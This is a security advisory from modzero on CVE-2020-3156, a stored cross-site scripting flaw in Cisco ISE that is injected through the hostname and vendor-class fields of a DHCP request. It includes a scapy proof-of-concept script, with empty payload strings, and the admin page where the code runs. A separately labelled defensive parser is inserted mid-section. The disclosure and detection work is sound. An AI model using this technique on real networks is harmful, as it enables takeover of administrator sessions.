----------------------------------------------------[MZ-19-03]----v1.2--
modzero Security Advisory:
Unauthenticated persistent cross-site scripting injection into the
administrative console of CISCO ISE web application via DHCP request
------------------------------------------------------------------------
------------------------------------------------------------------------
1. Timeline
------------------------------------------------------------------------
* 2019-11-22: Advisory sent to Cisco PSIRT psirt@cisco.com
* 2019-11-22: PSIRT opened case (PSIRT-0535851956)
* 2019-11-22: PSIRT communicated tentative publishing date '2020-02-19'
* 2020-02-12: PSIRT incident manager confirmed reproducibility
* 2020-02-12: Received an unofficial CVE Number CVE-2020-3156
* 2020-02-19: modzero released advisory to the public
In accordance with modzero's disclosure policy, the advisory is
expected to be published not later than February 21st, 2020. Our
disclosure policy is available at:
https://www.modzero.ch/static/modzero_Disclosure_Policy.pdf
------------------------------------------------------------------------
2. About
------------------------------------------------------------------------
Affected vendor: Cisco
Latest products and versions known to be vulnerable:
* Cisco Identity Services Engine version 2.6.0.156, Patch 2,3
- Product Identifier: SNS-3655-K9
- Version Identifier A0
- ADE-OS Version 3.0.5.144
The Cisco Identity Services Engine is the engine behind Cisco's Network
Access Control solution. It enables the creation and enforcement of
security and access policies for endpoint devices connected to the
company's routers and switches.
------------------------------------------------------------------------
3. Details
------------------------------------------------------------------------
An unauthenticated attacker who is able to inject a specially crafted
DHCP request packet into a network controlled by Cisco Identity
Services Engine (ISE) is able to persistently store code (e.g.
JavaScript) which is then executed in the context of the Web browser
accessing the Web-based management interface.
The vulnerability is due to insufficient validation and encoding of the
attacker-controllable input within the hostname and vendor class
identifier fields of processed DHCP request packets.
The attacker-controlled code is executed in the context of the user
currently logged in to the Web-based management console as soon as a
legitimate user reviews the stored endpoint's attribute details within
the Identity Services Engine's Web-based management interface, i.e. by
opening the following URL:
https://ISESRV/admin/login.jsp#context_dir/context_dir_devices/endpointDetails
------------------------------------------------------------------------
4. Impact
------------------------------------------------------------------------
The code will be executed with the rights of the user accessing the
Web-based management console. If the user has administrative rights, the
attacker might be able to leverage arbitrary functions of the Web-based
management interface.
------------------------------------------------------------------------
5. Proof of Concept exploit
------------------------------------------------------------------------
Using the following Python script (scapy), two simple JavaScript code
fragments are sent in the hostname and vendor class identifier options
of a broadcast DHCP request.
#!/usr/bin/env python
from scapy.all import *

conf.iface = "eth0"

# Contents of the two client-controlled DHCP options (hostname, vendor class id)
hostname_payload = ""
vendor_class_id_payload = ""

# Hardware address of the sending interface; used as Ethernet source and BOOTP chaddr
_, hw = get_if_raw_hwaddr(conf.iface)

# Broadcast DHCPREQUEST from 0.0.0.0:68 to 255.255.255.255:67
ethernet = Ether(dst="ff:ff:ff:ff:ff:ff", src=hw, type=0x800)
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
bootp = BOOTP(op=1, chaddr=hw)
dhcp = DHCP(options=[("message-type", "request"),
                     ("hostname", hostname_payload),
                     ("vendor_class_id", vendor_class_id_payload),
                     "end"])
packet = ethernet / ip / udp / bootp / dhcp
sendp(packet, iface=conf.iface)
Once a person reviews the attributes of an endpoint within the ISE
Web-based management interface, the code will be executed.
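The two fields named in sections 3 and 5 are DHCP option 12 (host name) and option 60 (vendor class identifier). The following Python is an added example, not the advisory's PoC and not Cisco's code: it parses the option area of a raw DHCP message, flags the two client-controlled values when they carry HTML metacharacters, and produces the HTML-escaped form that a management UI should render instead of the raw string (the missing encoding step described in section 3). The function names, the RFC 1123 host-name check and the constructed sample packet from build_request are this example's own assumptions.

```python
import html
import re

# RFC 1123 host name: labels of letters, digits, hyphens; no leading/trailing hyphen.
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
HTML_META = re.compile(r"[<>\"'&]")
MAGIC = b"\x63\x82\x53\x63"  # DHCP magic cookie, follows the 236-byte BOOTP header

def parse_dhcp_options(payload: bytes) -> dict:
    """Return {code: value} for the TLV options of a raw DHCP message (UDP payload)."""
    if len(payload) < 240 or payload[236:240] != MAGIC:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == 0:            # pad option: single byte, no length field
            i += 1
            continue
        if code == 255:          # end option
            break
        hdr = payload[i:i + 2]
        if len(hdr) < 2 or i + 2 + hdr[1] > len(payload):
            raise ValueError("truncated option %d" % code)
        opts[code] = payload[i + 2:i + 2 + hdr[1]]
        i += 2 + hdr[1]
    return opts

def classify_field(raw: bytes, strict_hostname: bool) -> dict:
    """Decode a client-supplied option, flag HTML metacharacters, return a safe-to-render form."""
    text = raw.decode("utf-8", errors="replace")
    suspicious = bool(HTML_META.search(text))
    # Assumed policy: host names must satisfy RFC 1123; vendor class ids must just be metachar-free.
    valid = bool(HOSTNAME_RE.match(text)) if strict_hostname else not suspicious
    return {"text": text, "valid": valid, "suspicious": suspicious,
            "render": html.escape(text, quote=True)}

def check_dhcp_request(payload: bytes) -> dict:
    """Inspect option 12 (host name) and option 60 (vendor class identifier)."""
    opts = parse_dhcp_options(payload)
    return {"hostname": classify_field(opts.get(12, b""), True),
            "vendor_class_id": classify_field(opts.get(60, b""), False)}

def build_request(hostname: bytes, vendor_class: bytes) -> bytes:
    """Constructed sample DHCPREQUEST (zeroed BOOTP header) for offline testing only."""
    header = b"\x01" + b"\x00" * 235            # op=BOOTREQUEST, remaining header fields zero
    opts = (b"\x35\x01\x03"                      # option 53 = DHCPREQUEST
            + bytes([12, len(hostname)]) + hostname
            + bytes([60, len(vendor_class)]) + vendor_class
            + b"\xff")
    return header + MAGIC + opts
```

A monitoring sensor can apply check_dhcp_request to the UDP payload of every DHCP request on a segment and alert on any field with suspicious set, while a management UI should only ever display the render value.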
------------------------------------------------------------------------
6. Workaround
------------------------------------------------------------------------
-
------------------------------------------------------------------------
7. Fix
------------------------------------------------------------------------
No software updates are available yet.
------------------------------------------------------------------------
8. Credits
------------------------------------------------------------------------
* Max Moser
* Katharina Maennle
------------------------------------------------------------------------
9. About modzero
------------------------------------------------------------------------
The independent company modzero assists clients with security analysis
in the complex areas of computer technology. The focus lies on
highly detailed technical analysis of concepts, software and
hardware components as well as the development of individual
solutions. Colleagues at modzero work exclusively in practical,
highly technical computer-security areas and can draw on decades of
experience in various platforms, system concepts, and designs.
Website: https://www.modzero.ch
E-Mail: contact@modzero.ch
------------------------------------------------------------------------
10. Disclaimer
------------------------------------------------------------------------
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.